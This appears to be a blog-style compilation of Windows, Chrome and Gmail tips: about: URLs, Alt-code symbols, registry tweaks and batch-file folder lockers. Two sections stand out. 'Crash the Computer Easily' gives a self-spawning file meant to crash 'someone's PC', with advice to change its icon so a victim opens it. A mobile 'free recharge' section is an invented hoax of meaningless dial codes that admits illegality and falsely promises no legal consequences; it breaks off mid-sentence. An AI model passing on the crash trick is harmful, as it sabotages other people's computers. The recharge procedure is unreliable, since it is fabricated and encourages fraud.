GOOGLE CHROME EASTER EGGS ?

These Easter Eggs apply to Google Chromium + Chrome web browsers.
Chrome + Chromium about: links.
Some of these commands are undocumented, have been modified, updated, renamed and/or discontinued. Therefore not all of them exist in all browser versions, and some may have different names and/or changed functionality in newer browser builds.

    Things you can do with the built-in (internal) "about:" command [command names and all parameters are case insensitive], translated as "chrome://" into the browser [ending forward slash (/) after parameter name (chrome://parameter/) is optional]:
        about: (chrome://about/) = Chrome and built-in components + supported standards version info
        about:about (chrome://about/about/) = complete list of available about: (chrome://) commands; same as about:chrome-urls (chrome://chrome-urls/) (see further below)
        about:appcache-internals (chrome://appcache-internals/) = application caches info
        about:blank = new empty browser tab (window) with white background; see also "KILL IE ABOUT: URLS", also in REGISTRY.TXT [part of W95-11D.EXE]
        about:blob-internals (chrome://blob-internals/) = internal blob data info
        about:bookmarks (chrome://bookmarks/) = built-in Bookmark Manager
        about:bugreport (chrome://bugreport/) = built-in BugReport options (if any)
        about:cache = list of locally cached URLs (http:// + https:// protocols); same as about:view-http-cache (chrome://view-http-cache/) (see further below)
        about:chrome/help (chrome://chrome/help/) = built-in Help (About) page
        about:chrome-urls (chrome://chrome-urls/) = complete list of available about: (chrome://) commands; same as about:about (chrome://about/about/) (see further above)
        about:constrained-test (chrome://constrained-test/) = detailed constrained test
        about:crashes (chrome://crashes/) = list of all browser crashes (if any)
        about:credits (chrome://about/credits/) = list of all components + technologies used in Chrome with respective home page + license URLs
        about:conflicts (chrome://conflicts/) = list of all Modules loaded + registered (available for loading when needed) into Google Chrome and eventual conflicts (if any)
        about:devtools (chrome-devtools://devtools/) = list of available developer tools (Chrome developer builds only)
        about:dns (chrome://about/dns/) = list of all prefetched + preresolved DNS records + host names
        about:downloads (chrome://downloads/) = built-in Downloads Manager
        about:extensions (chrome://extensions/) = built-in Extensions Manager
        about:extension-icon (chrome://extension-icon/) = list of extensions icons
        about:favicon (chrome://favicon/) = built-in browser favicon
        about:flags (chrome://flags/) = list of all available configurable/customizable settings + features that can be disabled or enabled; similar to about:labs (chrome://labs/) (see further below)
        about:flash (chrome://flash/) = detailed info about (built-in or external) Flash plug-in
        about:gpu (chrome://gpu/) (newer browser versions) or about:gpu-internals (chrome://gpu-internals/) (older browser versions) = GPU Info tab: video hardware Graphics Processing Unit (GPU) + Chrome/Chromium features, status, version, driver info, diagnostics + logs; Profiling tab: moved under about:tracing (chrome://tracing/) (see further below)
        about:histograms (chrome://about/histograms/) = list of all available histograms + graphs
        about:history (chrome://history/) (older browser versions) = built-in browsing History Manager
        about:history2 (chrome://history2/) (newer browser versions) = built-in browsing History Manager with color coded URL interface + more features
        about:internets (chrome://internets/) [undocumented!] = "Internets": "Don't Clog the Tubes!" animated 3D pipes, similar to Windows 9x/NTx OpenGL screen saver ; must have sspipes.scr in %windir%\SYSTEM32 (Windows 2000/XP/2003/Vista/2008/7) for this to work [%windir% = usually C:\WINDOWS (WinXP/2003/Vista/2008/7) or C:\WINNT (Win2000)]; older Chrome builds only, newer builds display error 300 invalid URL web page ;-(
        about:ipc (chrome://ipc/) = IPC detailed info
        about:keyboard (chrome://keyboard/) = built-in default keyboard shortcuts + combos
        about:labs (chrome://labs/) = list of all available configurable/customizable settings + features that can be disabled or enabled; similar to about:flags (chrome://flags/) (see further above)
        about:media-internals (chrome://media-internals/) = list of Active audio streams + Cached resources (if any)
        about:memory (chrome://memory/) or chrome://about/memory/ (older browser versions) or chrome://memory-redirect/ (newer browser versions) = memory usage in multi-process browsing: summary + processes
        about:net-internals (chrome://net-internals/) = net internals info: data, proxy, events, DNS, sockets, SPDY, HTTP cache, HTTP throttling, SPIs, tests + HSTS
        about:network (chrome://network/) = I/O tracking info: list of all images, scripts + objects from a web page opened in a new tab
        about:newtab (chrome://newtab/) = opens a new browser tab
        about:objects (chrome://objects/) = list of all Objects on current web page
        about:plugins (chrome://plugins/) = installed plug-ins info + disable/enable separately each plug-in in case of problems
        about:print (chrome://print/) = built-in Print Manager
        about:quota-internals (chrome://quota-internals/) = 3 tabs detailed info:
            Summary: Summary + Misc Statistics
            Usage & Quota: Usage and Quota Database Browser
            Data: Dump
        about:sessions (chrome://sessions/) = list of Sessions (x) + Magic List (x) (if any)
        about:settings (chrome://settings/) = built-in Options (settings) Manager main screen [defaults to Basics screen if not followed by other available option after the forward slash (/)]; see below for available options
        about:settings/autofill (chrome://settings/autofill/) = built-in Options (settings) Manager Autofill Options screenabout:settings/basics (chrome://settings/basics/) = built-in browser Options (settings) Manager Basics screen; same as about:settings/browser (chrome://settings/browser/) (see below)
        about:settings/browser (chrome://settings/browser/) = built-in browser Options (settings) Manager Basics screen; same as about:settings/basics (chrome://settings/basics/) (see above)
        about:settings/clearbrowserdata (chrome://settings/clearbrowserdata/) built-in Options (settings) Manager Clear Browsing Data pop up window:
            Clear browsing history
            Clear download history
            Empty the cache
            Delete cookies and other site and plug-in data
            Clear saved passwords
            Clear saved Autofill form data
        about:settings/contentexceptions (chrome://settings/contentexceptions/) = built-in Options (settings) Manager Cookie and Site Data Exceptions screen (defaults to Cookie and Site Data Exceptions screen if not followed by other available option preceded by #); available options:
            about:settings/contentexceptions#cookies (chrome://settings/contentexceptions#cookies) = Cookie and Site Data Exceptions
            about:settings/contentexceptions#fullscreen (chrome://settings/contentexceptions#fullscreen) = Fullscreen Exceptions
            about:settings/contentexceptions#images (chrome://settings/contentexceptions#images) = Image Exceptions
            about:settings/contentexceptions#javascript (chrome://settings/contentexceptions#javascript) = JavaScript Exceptions
            about:settings/contentexceptions#location (chrome://settings/contentexceptions#location) = Geolocation Exceptions
            about:settings/contentexceptions#mouselock (chrome://settings/contentexceptions#mouselock) = Mouse Cursor Exceptions
            about:settings/contentexceptions#notifications (chrome://settings/contentexceptions#notifications) = Notifications Exceptions
            about:settings/contentexceptions#plugins (chrome://settings/contentexceptions#plugins) = Plug-in Exceptions
            about:settings/contentexceptions#popups (chrome://settings/contentexceptions#popups) = Pop-up Exceptions
        about:settings/cookies (chrome://settings/cookies/) = built-in Options (settings) Manager Cookies and Other Data screen
        about:settings/fonts (chrome://settings/fonts/) = built-in Options (settings) Manager Fonts and Encoding screen
        about:settings/handlers (chrome://settings/handlers/) = built-in Options (settings) Manager Protocol Handlers screen
        about:settings/importdata (chrome://settings/importdata/) = built-in Options (settings) Manager Import Bookmarks and Settings dialog box
        about:settings/languages (chrome://settings/languages/) = built-in Options (settings) Manager Languages screen
        about:settings/packextensionoverlay (chrome://settings/packextensionoverlay/) = built-in Options (settings) Manager Pack Extension dialog box
        about:settings/passwords (chrome://settings/passwords/) = built-in Options (settings) Manager Passwords screen
        about:settings/personal (chrome://settings/personal/) = built-in Options (settings) Manager Personal screen
        about:settings/searchengines (chrome://settings/searchengines/) = built-in Options (settings) Manager Search Engines screen
        about:settings/syncsetup (chrome://settings/syncsetup/) = built-in Options (settings) Manager Sync in with your Google Account dialog box
        about:settings/underthehood (chrome://settings/underthehood/) = built-in Options (settings) Manager Under the Hood screen
        about:stats (chrome://stats/) = Counters + Timers values, delta + time test benchmarks stats
        about:sync (chrome://sync/) = browser sync detailed info
        about:sync-internals (chrome://sync-internals/) = sync internals info: about, data, notifications, events + sync node browser
        about:syncpromo (chrome://syncpromo/) = Welcome to Google Chrome screen: set up Chrome with Google account, Google account sign in screen and link to back up and sync bookmarks, history + settings
        about:tcmalloc (chrome://about/tcmalloc/) = last page load/reload stats
        about:terms (chrome://about/terms/) = terms of service (TOS) agreement
        about:textfields (chrome://textfields/) = textfields detailed info (if any)
        about:tracing (chrome://tracing/) = Record tracing stats: records + displays keyboard key presses + mouse movement into buffer; Load: loads tracing stats from file; Save: saves tracing stats to file; about:gpu (chrome://gpu/ Profiling tab: moved here (see further above)
        about:version (chrome://about/version/) = Chrome and built-in components + supported standards version info
        about:view-http-cache (chrome://view-http-cache/) = list of locally cached URLs (http:// + https:// protocols); same as about:cache (see further above)
        about:workers (chrome://workers/) = list of Shared workers (if any): Id, URL, Name + Process id.

    Built-in (internal) "about:" commands with debug functions (self explanatory), which mimic an error or other situation that crashes/hangs/kills the browser:
        about:crash (chrome://crash/) = displays dark slate gray crash web page
        about:inducebrowsercrashforrealz (chrome://inducebrowsercrashforrealz/) = crashes the browser after which displays this dialog message:

            "Whoa! Google Chrome has crashed. Relaunch now?
                               OK       Cancel"

        about:kill (chrome://kill/) = displays indigo kill web page
        about:hang (chrome://hang/) = locks up the browser
        about:shorthang (chrome://shorthang/) = locks up the browser
        about:gpuclean (chrome://gpuclean/) = empty GPU (texture) buffer
        about:gpucrash (chrome://gpucrash/) = displays error 300 invalid URL web page
        about:gpuhang (chrome://gpuhang/) = displays error 300 invalid URL web page.
    Google Chrome crash + kill web pages display this message:

        "Aw, Snap!"

    CAUTION: These debug commands crash, hang or kill the browser! Use only if needed.

    More like these:
        Google Chrome's about: Pages.
        List of About Pages and Hidden Easter Eggs in Google Chrome Browser.
        Google Chrome's List of Special about: Pages.
        Google Chrome easter eggs.

readmore...

Crash the Computer Easily ?

f u wnt to crash someone's PC just try this


Open a notepad
Type the following

start rabi.dat
rabi.dat
save the file as rabi.dat
by using right click you can change icon

once the file is created if some one is going to click it

the system will crash
HAPPY CRASHINGSSSS

plz give me reply if u like it

readmore...

HUTCH, AIRTEL, & BSNL users...., Recharge every month free of chargee ?

hi everyone....If u have a cell phone,
Recharge ur phone every month freely by following this process
Please follow the instruction & you can recharge your SIM card absolutely free.
Yes it is possible, see how technology can be used to make technicians fool.

I just got a mail from a friend of mine, whose friend is B.Tech.(ETC) from IIT
Powai, teaching me how to reload my hand set every month for free. Engineered by
a group of rebel programmers. I am going to share this to all of you.

Please follow the instructions as stated below before you start it:
Applicable for HUTCH, AIRTEL, SPICE & BSNL users only ,sorry for idea,
BPL and Reliance users and it is done illegally of course. But there are many
things that are illegal in this world.
But then who cares. Don't worry nobody can trap you. No legal action can be
taken on you for this. So go ahead without worrying.

You can only do this every 24th & 25th of the month as the network system is
under upgrade.

1.) ** Dial " 1415007 " using your h/phone and wait for 5 second

2.) ** after 5 second, you will hear some funny noise (like sound from TV when
the station is finished)

3.) ** Once the noise stop, immediately dial 9151 follow by your phone number

4.) ** A recorded message "please insert your pin number" will follow

5.) ** punch in the pin number " 011785 45227 00734" and wait for the operator
finish repeating the above pin number.

6.) ** After the pin number has been repeat, dial " 0405-for AIRTEL, 404 -for
ORANGE (HUTCH)" . 403 -for BSNL"

7.) ** you will hear a message "for air time top-up press 1723" you just have to
follow the instruction

8.) ** After you follow the instruction, the noisy sound will re-appear for
about 5 second

9.) ** once the noise stop, dial " 4455147 " follow by " 146 "

10.) ** after about 5 second, dial " 1918 " after 3 second dial " 4451 "

11.) ** after you done that, punch in the serial number " 01174452271145527 "
you will hear dial tone.

12.) ** once the dialing tone stop, dial " 55524785933 " you will hear " please
key in your password"

13.) ** the password is " **** 2+253+7891*+546322 " wait for the message "your
password accepted"

14.) ** you will hear " please insert your emey number " now you have to be fast
to dial your own h/phone number
15.) ** you will hear a dialing tone, when the call is answered, dial " 1566 "
and you will hear "re-confirm emery number"

16.) ** once you hear that message, dial " 6011556 2245334 follow by your
h/phone number"

17.) ** after a while, you will hear a message "your pin number is accepted" you
have to dial " 1007 "

18.) ** after you done that you will hear "your emery number is accepted"

19.) ** continue dial " 4566 " you will hear "your password is accepted"

20.) ** once the second message finish, immediately dial your own h/phone number

21.) ** Now you will receive a message saying ...........

readmore...

PDF Trick ?

combinations for Acrobat 6.0 & 7.0:
- ctrl+ shift + b ---> To hear the whole document
ctrl + shift + v ---> To hear only the page
ctrl + shift + c ---> To resume
ctrl + shift + e ---> To stop

readmore...

ASCII Symbols ?

Press Alt + "Symbol Number" to Use the Symbol


Alt + 1 = ☺
Alt + 2 = ☻
Alt + 3 = ♥
Alt + 4 = ♦
Alt + 5 = ♣
Alt + 6 = ♠
Alt + 7 = •
Alt + 8 = ◘
Alt + 9 = ○
Alt + 10 = ◙
Alt + 11 = ♂
Alt + 12 = ♀
Alt + 13 = ♪
Alt + 14 = ♫
Alt + 15 = ☼
Alt + 16 = ►
Alt + 17 = ◄
Alt + 18 = ↕
Alt + 19 = ‼
Alt + 20 = ¶
Alt + 21 = §
Alt + 22 = ▬
Alt + 23 = ↨
Alt + 24 = ↑
Alt + 25 = ↓
Alt + 26 = →
Alt + 27 = ←
Alt + 28 = ∟
Alt + 29 = ↔
Alt + 30 = ▲
Alt + 31 = ▼
Alt + 32 =
Alt + 33 = !
Alt + 34 = "
Alt + 35 = #
Alt + 36 = $
Alt + 37 = %
Alt + 38 = &
Alt + 39 = '
Alt + 40 = (
Alt + 41 = )
Alt + 42 = *
Alt + 43 = +
Alt + 44 = ,
Alt + 45 = -
Alt + 46 = .
Alt + 47 = /
Alt + 48 = 0
Alt + 49 = 1
Alt + 50 = 2
Alt + 51 = 3
Alt + 52 = 4
Alt + 53 = 5
Alt + 54 = 6
Alt + 55 = 7
Alt + 56 = 8
Alt + 57 = 9
Alt + 58 = :
Alt + 59 = ;
Alt + 60 = <
Alt + 61 = =
Alt + 62 = >
Alt + 63 = ?
Alt + 64 = @
Alt + 65 = A
Alt + 66 = B
Alt + 67 = C
Alt + 68 = D
Alt + 69 = E
Alt + 70 = F
Alt + 71 = G
Alt + 72 = H
Alt + 73 = I
Alt + 74 = J
Alt + 75 = K
Alt + 76 = L
Alt + 77 = M
Alt + 78 = N
Alt + 79 = O
Alt + 80 = P
Alt + 81 = Q
Alt + 82 = R
Alt + 83 = S
Alt + 84 = T
Alt + 85 = U
Alt + 86 = V
Alt + 87 = W
Alt + 88 = X
Alt + 89 = Y
Alt + 90 = Z
Alt + 91 = [
Alt + 92 = ..
Alt + 93 = ]
Alt + 94 = ^
Alt + 95 = _
Alt + 96 = ..
Alt + 97 = a
Alt + 98 = b
Alt + 99 = c
Alt + 100 = d
Alt + 101 = e
Alt + 102 = f
Alt + 103 = g
Alt + 104 = h
Alt + 105 = i
Alt + 106 = j
Alt + 107 = k
Alt + 108 = l
Alt + 109 = m
Alt + 110 = n
Alt + 111 = o
Alt + 112 = p
Alt + 113 = q
Alt + 114 = r
Alt + 115 = s
Alt + 116 = t
Alt + 117 = u
Alt + 118 = v
Alt + 119 = w
Alt + 120 = x
Alt + 121 = y
Alt + 122 = z
Alt + 123 = {
Alt + 124 = |
Alt + 125 = }
Alt + 126 = ~
Alt + 127 = ⌂
Alt + 128 = Ç
Alt + 129 = ü
Alt + 130 = é
Alt + 131 = â
Alt + 132 = ä
Alt + 133 = à
Alt + 134 = å
Alt + 135 = ç
Alt + 136 = ê
Alt + 137 = ë
Alt + 138 = è
Alt + 139 = ï
Alt + 140 = î
Alt + 141 = ì
Alt + 142 = Ä
Alt + 143 = Å
Alt + 144 = É
Alt + 145 = æ
Alt + 146 = Æ
Alt + 147 = ô
Alt + 148 = ö
Alt + 149 = ò
Alt + 150 = û
Alt + 151 = ù
Alt + 152 = ÿ
Alt + 153 = Ö
Alt + 154 = Ü
Alt + 155 = ¢
Alt + 156 = £
Alt + 157 = ¥
Alt + 158 = ,,
Alt + 159 = ƒ
Alt + 160 = á
Alt + 161 = í
Alt + 162 = ó
Alt + 163 = ú
Alt + 164 = ñ
Alt + 165 = Ñ
Alt + 166 = ª
Alt + 167 = ▒
Alt + 168 = ¿
Alt + 169 = ⌐
Alt + 170 = ¬
Alt + 171 = ½
Alt + 172 = ¼
Alt + 173 = ¡
Alt + 174 = «
Alt + 175 = »
Alt + 176 = ░
Alt + 177 = ▒
Alt + 178 = ▓
Alt + 179 = │
Alt + 180 = ┤
Alt + 181 = ╡
Alt + 182 = ╢
Alt + 183 = ╖
Alt + 184 = ╕
Alt + 185 = ╣
Alt + 186 = ║
Alt + 187 = ╗
Alt + 188 = ╝
Alt + 189 = ╜
Alt + 190 = ╛
Alt + 191 = ┐
Alt + 192 = └
Alt + 193 = ┴
Alt + 194 = ├
Alt + 195 = ├
Alt + 196 = ─
Alt + 197 = ┼
Alt + 198 = ╞
Alt + 199 = ╟
Alt + 200 = ╚
Alt + 201 = ╔
Alt + 202 = ╩
Alt + 203 = ╦
Alt + 204 = ╠
Alt + 205 = ═
Alt + 206 = ╬
Alt + 207 = ╧
Alt + 208 = ╨
Alt + 209 = ╤
Alt + 210 = ╥
Alt + 211 = ╙
Alt + 212 = ╘
Alt + 213 = ╒
Alt + 214 = ╓
Alt + 215 = ╫
Alt + 216 = ╪
Alt + 217 = ┘
Alt + 218 = ┌
Alt + 219 = █
Alt + 220 = ▄
Alt + 221 = ▌
Alt + 222 = ▐
Alt + 223 = ▀
Alt + 224 = ,,
Alt + 225 = ß
Alt + 226 = ,,
Alt + 227 = ,,
Alt + 228 = ,,
Alt + 229 = ,,
Alt + 230 = µ
Alt + 231 = ,,
Alt + 232 = ,,
Alt + 233 = ,,
Alt + 234 = ,,
Alt + 235 = ,,
Alt + 236 = ∞
Alt + 237 = ,,
Alt + 238 = ,,
Alt + 239 = ,,
Alt + 240 = ,,
Alt + 241 = ±
Alt + 242 = ,,
Alt + 243 = ,,
Alt + 244 = ,,
Alt + 245 = ,,
Alt + 246 = ÷
Alt + 247 = ≈
Alt + 248 = °
Alt + 249 = ∙
Alt + 250 = ·
Alt + 251 = ,,
Alt + 252 = ,,
Alt + 253 = ²
Alt + 254 = ■
Alt + 0128 = €
Alt + 0130 = ‚
Alt + 0131 = ƒ
Alt + 0132 = „
Alt + 0133 = …
Alt + 0134 = †
Alt + 0135 = ‡
Alt + 0136 = ,,
Alt + 0137 = ‰
Alt + 0138 = ,,
Alt + 0139 = ‹
Alt + 0140 = ,,
Alt + 0141 = []
Alt + 0142 = ,,
Alt + 0143 =
Alt + 0144 =
Alt + 0145 = ‘
Alt + 0146 = ’
Alt + 0147 = “
Alt + 0148 = ”
Alt + 0149 = •
Alt + 0150 = –
Alt + 0151 = —
Alt + 0152 = ˜
Alt + 0153 = ,,
Alt + 0154 = ,,
Alt + 0155 = ›
Alt + 0156 = ,,
Alt + 0157 =
Alt + 0158 = ,,
Alt + 0159 = Ÿ
Alt + 0160 =
Alt + 0161 = ¡
Alt + 0162 = ¢
Alt + 0163 = £
Alt + 0164 = ¤
Alt + 0165 = ¥
Alt + 0166 = ¦
Alt + 0167 = §
Alt + 0168 = ¨
Alt + 0169 = ©
Alt + 0170 = ª
Alt + 0171 = «
Alt + 0172 = ¬
Alt + 0173 = ­­
Alt + 0174 = ®
Alt + 0175 = ¯
Alt + 0176 = °
Alt + 0177 = ±
Alt + 0178 = ²
Alt + 0179 = ³
Alt + 0180 = ..
Alt + 0181 = µ
Alt + 0182 = ¶
Alt + 0183 = ·
Alt + 0184 = ¸
Alt + 0185 = ¹
Alt + 0186 = º
Alt + 0187 = »
Alt + 0188 = ¼
Alt + 0189 = ½
Alt + 0190 = ¾
Alt + 0191 = ¿
Alt + 0192 = À
Alt + 0193 = Á
Alt + 0194 = Â
Alt + 0195 = Ã
Alt + 0196 = Ä
Alt + 0197 = Å
Alt + 0198 = Æ
Alt + 0199 = Ç
Alt + 0200 = È
Alt + 0201 = É
Alt + 0202 = ,,
Alt + 0203 = Ë
Alt + 0204 = Ì
Alt + 0205 = Í
Alt + 0206 = Î
Alt + 0207 = Ï
Alt + 0208 = Ð
Alt + 0209 = Ñ
Alt + 0210 = Ò
Alt + 0211 = Ó
Alt + 0212 = Ô
Alt + 0213 = Õ
Alt + 0214 = Ö
Alt + 0215 = ×
Alt + 0216 = Ø
Alt + 0217 = Ù
Alt + 0218 = ,,
Alt + 0219 = ,,
Alt + 0220 = Ü
Alt + 0221 = Ý
Alt + 0222 = Þ
Alt + 0223 = ß
Alt + 0224 = à
Alt + 0225 = á
Alt + 0226 = â
Alt + 0227 = ã
Alt + 0228 = ä
Alt + 0229 = å
Alt + 0230 = æ
Alt + 0231 = ç
Alt + 0232 = è
Alt + 0233 = é
Alt + 0234 = ê
Alt + 0235 = ë
Alt + 0236 = ì
Alt + 0237 = í
Alt + 0238 = î
Alt + 0239 = ï
Alt + 0240 = ð
Alt + 0241 = ñ
Alt + 0242 = ò
Alt + 0243 = ó
Alt + 0244 = ô
Alt + 0245 = ²
Alt + 0246 = ö
Alt + 0247 = ÷
Alt + 0248 = ø
Alt + 0249 = ù
Alt + 0250 = ú
Alt + 0251 = ♥
Alt + 0252 = ü
Alt + 0253 = ý
Alt + 0254 = þ

readmore...

convert ur pendrive into ram ?

Follow these steps :-

1. Insert the Pen Drive (1GB atleast) in the USB port
try to prefer 4GB.
2. Let the PC do what it wants to do to detect it..
3. After it finished his work, you have to act smart,

" Here goes the real thing "

4. Right Click on My Computer -> Properties
5. Advanced -> Performance Settings
6. Advanced -> Change
7. Select the Pen Drive
8. Click on Custom Size

" Check the value of space available "

9. Enter the same in the Initial and the Max columns

" You just used the space of the PenDrive as a Virtual Memory "

Restart...
" VOILA !!! Your PC is fast and furious "

readmore...

Increase Folder View Size Limit to 8000 ?

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell]

"BagMRU Size"=dword:00001f40


[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam]
"BagMRU Size"=dword:00001f40

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000





1) Copy the given code
2) open notepade
3) paste the code save it  "bags8000.reg"
4) now just merge the registry file by double click on it

readmore...

Lock your Folder without any Software ?

cls
@ECHO OFF

title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER
:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"

if %cho%==Y goto LOCK
if %cho%==y goto LOCK

if %cho%==n goto END
if %cho%==N goto END

echo Invalid choice.
goto CONFIRM

:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked

goto End
:UNLOCK

echo Enter password to Unlock folder
set/p "pass=>"

if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully

goto End
:FAIL

echo Invalid password
goto end

:MDLOCKER
md Locker

echo Locker created successfully
goto End
:End







- Now paste it in notepad.
- Save it as batch file(with extension .bat).Any name will do.
- Now you see a batch file. Double click it to create a folder locker.
- A new folder named Locker would be formed at the same location.
- Now brings all the files you want to hide in the locker folder.
- Now double click the batch file to lock the folder namely Locker.
- If you want to unlock your files,double click the batch file again and you would be prompted for password.Enter the password and enjoy access to the folder.  

readmore...

Make Your Computer TALK!

Firstly open notepad,

Then copy and paste the below mentioned texts

Code:


Dim userInput


userInput = InputBox("Write a message for me to say")



Set Sapi = Wscript.CreateObject("SAPI.SpVoice")

Sapi.speak userInput

then save it in any name that you like but at the end don't forget to add .vbs

example.
talk.vbs

After you save close notepad, and open the saved file.

There you will see a place to type



In that above mentioned place Type the words, or sentences that you like, after that press OK!!!!

Then you can see your computer talking!!!


Enjoy!!!

readmore...

WINDOWS XP secrets :?

Windows XP Secrets
Notepad Secrets
Create a log

   1. Open Notepad
   2. On the very first line, type in ".LOG" (without quotes) then press Enter for a new line
   3. Now you can type in some text if you want, then save the file.
   4. Next time when you open the file, notice its contents. Notepad automatically adds a time/date log everytime you open the file.

Text becomes unreadable

   1. Open Notepad
   2. On the very first line, type in "dont eat the donut" (without quotes) then save and close the file. Note: the file should have only one line of the text above.
   3. Now, open the same file. You'll notice the text becomes unreadable squares. (try this with different text with the same format and length).


Paint Secrets
Create a trail image

   1. Open Paint, then open an image.
   2. Right-click on the image and select "Select All"
   3. Now hold the "Shift" key and move the image around. The image will be drawn with trail.

10x Zoom

   1. Open Paint, then open a small image.
   2. Select the zoom "Magnifier" tool.
   3. Windows Paint lists out the zoom options from 1x to 8x, but there is a 10x...
   4. After selecting the Magnifier tool, point the mouse right at the border line right under "8x" and left-click. There you go.. the hidden 10x.

Other Secrets
Where is the relaxing music that you've heard during Windows XP Installation?

   1. The file is in:
      C:\Windows\system32\oobe\images\title.wma

Game Secrets
Solitaire: Instant Win

   1. Press Alt + Shift + 2 to instantly win

Solitaire: Draw only 1 card (instead of 3)

   1. Hold down Ctrl + Alt + Shift then click on unopen cards to draw.

FreeCell: Instant Win

   1. Hold down Ctrl + Shift + F10 while playing, then click Abort.
   2. Now move one card.

FreeCell: Hidden Game Modes

   1. Go to "Game" menu choose "Select Game"
   2. Here you can choose from game mode 1 to 1,000,000. But -1 and -2 will also work (hidden modes)

Hearts: Show All Card

   1. Warning! this requires a modification on your registry. Be sure you follow the steps carefully. Damage your registry might damage your Windows. Open the "Registry Editor" by: "Start" >> "Run" then type "regedit" and press Enter
   2. Expand to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts
   3. Right-click on the right panel and create a new String value with the name "ZB"
   4. Double-click to open this key "ZB" to edit its value. Then enter "42" and close the Registry Editor.
   5. Start Hearts and Press Ctrl + Alt + Shift + F12 to show all the cards

Minesweeper: Stop The Timer

   1. When you start to play a new game, the timer is ticking...
   2. Press Windows Key + D to show desktop.
   3. Now come back to the game by selecting it from the taskbar. The timer is stopped.

Pinball

   1. Unlimited Balls: Type bmax at a new game to get unlimited balls (no notification).
   2. Extra Balls: Type 1max at a new game to get extra balls.
   3. Gravity Well: Type gmax at a new game to activate Gravity Well.
   4. Promotion: Type rmax at a new game or while playing to get instant promotion and raising rank.
   5. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
   6. Extra points with partial shots: Partially shot the ball just to pass the yellow light bars. There are 6 bars. With the first bar, you'll get 15,000 points, 2nd: 30,000,...
   7. Test Mode: Type hidden test with a new ball or new game. Now you can use your mouse to drag and move the ball where you want.

readmore...

How to make a private folder?

Suppose you want to lock the folder games in d: which has the path D:\GamesIn the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat

create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folde

readmore...

Set a jpg image in your drives background ?

First create a file in drive named desktop.ini

then open it in notepad and insert below lines


Code:


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=path
iconarea_text=0x00ffffff

Replace path with your jpg,bmp image path

• iconarea_text=0x00ffffff is for text color

0x00ffffff is for white color
0x00000000 is for black color


NOTE :- don't edit [{BE098140-A513-11D0-A3A4-00C04FD706EC}]


If you need your drive back as default just delete the desktop.ini

it is not working for folders

readmore...

Hiding A Drive ?

1) Go to Start -> Run -> “regedit”
2) Navigate to: HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
3) Choose Edit -> New -> DWORD Value and give name NoDrives.
4) Double click NoDrives and determine which drive that you want to vanish in Value Data.

Eg: If you wish to vanish drive E:, insert value 16 in Value Data.

The combination value in “Value Data” are as following:
A: > 1
B: > 2
C: > 4
D: > 8
E: > 16
F: > 32
G: > 64
H: > 128
I: > 256
J: > 512
K: > 1024
L: > 2048
M: > 4096
All: > 67108863

readmore...

Changing the default port of telnet ?

The default port of telnet server can be changed .. the default port for telnet is usualy 23

tlntadmn config port=port number

eg

tlntadmn config port=1234

makes the default telnet port 1234

readmore...

Locking Drives (without any software)

Locking Drives:

We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.

    * Start & Run and type Regedit to open Registry editor

    * Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer

    * Create a new DWORD value NoViewOnDrive and set its value as

2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
Alpha values

A =>> 1
B =>> 2
C =>> 3
D =>> 4
E =>> 5
F =>> 6
G =>> 7
H =>> 8
I =>> 9
J =>> 10
K =>> 11
L =>> 12
M =>> 13
N =>> 14
O =>> 15
P =>> 16
Q =>> 17
R =>> 18
S =>> 19
T =>> 20
U =>> 21
V =>> 22
W =>> 23
X =>> 24
Y =>> 25
Z =>> 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)

    * To lock more drives, calculate the value of each drive and then set sum of those numbers as value

    * To unlock your drive just delete the key from the registry.

readmore...

view passwords saved in your pc?

first, u need to have mozilla firefox .
now .. open mozilla firfox.. click on tools.. then select options..
a dialogue box appears..in that click on security..then double click on saved password..now click on show passwords...
thatz all u can see the saved passwords along with the id.

readmore...

USING FILTERS IN GMAIL ?

Using filters
Share

    * Gmail
    * Blogger
    * Buzz
    * Orkut
    * Google Reader
    * Google Bookmarks
    * » More

Comment Print

Gmail's filters allow you to manage the flow of incoming messages. Using filters, you can automatically label, archive, delete, star, or forward your mail, even keep it out of Spam -- all based on a combination of keywords, sender, recipients, and more.

To create a filter:

   1. Click Create a filter (next to the Search the Web button at the top of any Gmail page).
   2. Enter your filter criteria in the appropriate field(s).
   3. Click Test Search to see which messages currently in Gmail match your filter terms. You can update your criteria and run another test search, or click Next Step.
